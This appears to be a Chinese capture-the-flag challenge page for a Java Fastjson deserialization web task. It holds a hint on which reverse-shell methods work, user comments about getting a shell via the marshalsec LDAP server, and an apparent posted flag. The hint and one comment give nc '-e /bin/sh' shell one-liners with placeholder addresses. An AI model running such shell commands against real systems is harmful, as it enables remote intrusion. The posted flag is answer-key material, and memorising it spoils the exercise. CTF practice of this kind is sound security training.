Java Fastjson UnserializeWEB 未解决

分数: 40 金币: 5
题目作者: 云牧青
一  血: 云牧青
一血奖励: 8金币
解  决: 124
提  示: /bin/bash:x ; /bin/sh √ ; /dev/tcp × ; nc x.x.x.x x -e √ ;
描  述:
flag{}
评论
ilovevicky99 5月前

得不到反弹的shell呀 是一步一步按wp来的呀

回复 0

wxy1343 2年前

flag{c4825441cb7fe815994a6ba7651a9744}

回复 0

ruibiu 2年前

始终弹不回shell,回显com.alibaba.fastjson.JSONException: set property error, autoCommit

回复 1
txadmin 2年前

应该是jdk版本的问题,用jdk8可以反弹,用最新的jdk17反而不能

回复 0

jack12138 2年前

正向弹shell: nc ip port -e /bin/sh

回复 0

acvxd 3年前

误: 找不到或无法加载主类 marshalsec.jndi.LDAPRefServer

回复 0
sshui 2年前

工具坏了,重新找一个

回复 0

txadmin 3年前

解题参考 https://www.cnblogs.com/ktsm/p/15700289.html

回复 3
txadmin 2年前

@成朗 不好意思,最近复现了一下,代码确实有问题,不能用wget下载,而是访问那个网址或者git clone下来

回复 0

成朗 2年前

你这工具是坏的,虾仁猪心,,我用你的wp因为工具你编译的错误,导致我6个小时都在找哪里出错了。,,

回复 0

txadmin 3年前

题主是老java程序员吗?

回复 0
云牧青 3年前

并不是Java程序员,看代码就知道了,超水,哈哈哈

回复 0

blueyst 3年前

传payload直接传死机了可还行,痛失5金币,记仇ing

回复 2
云牧青 3年前

(つ﹏⊂)

回复 1

blueyst 3年前

自己抢自己一血了属于是

回复 2
云牧青 3年前

哈哈哈哈哈哈哈,没忍住

回复 1

云牧青 3年前

/bin/bash:x ; /bin/sh √ ; /dev/tcp × ; nc x.x.x.x x -e √ ;

回复 0

WriteUp

image
xiaoxiaoran

4 金币

评分(3)

解题动态

igrazee 攻破了该题 23小时前
jintian93 攻破了该题 7天前
facelessman 攻破了该题 9天前
18042157087 攻破了该题 10天前
yansec11 攻破了该题 13天前
365days 攻破了该题 16天前
592174532 攻破了该题 1月前
lzylbp 攻破了该题 1月前
kukuqi666 攻破了该题 1月前
19957910119 攻破了该题 2月前
风沙吹奏 攻破了该题 2月前
18128823868 攻破了该题 3月前
Bug@Bug 攻破了该题 3月前
xingjian 攻破了该题 3月前
zhoujielun666 攻破了该题 3月前
huahua428 攻破了该题 3月前
hshdgyq 攻破了该题 3月前
KarlOtto 攻破了该题 3月前
Ch3ss 攻破了该题 4月前
ilovevicky99 攻破了该题 4月前
问题反馈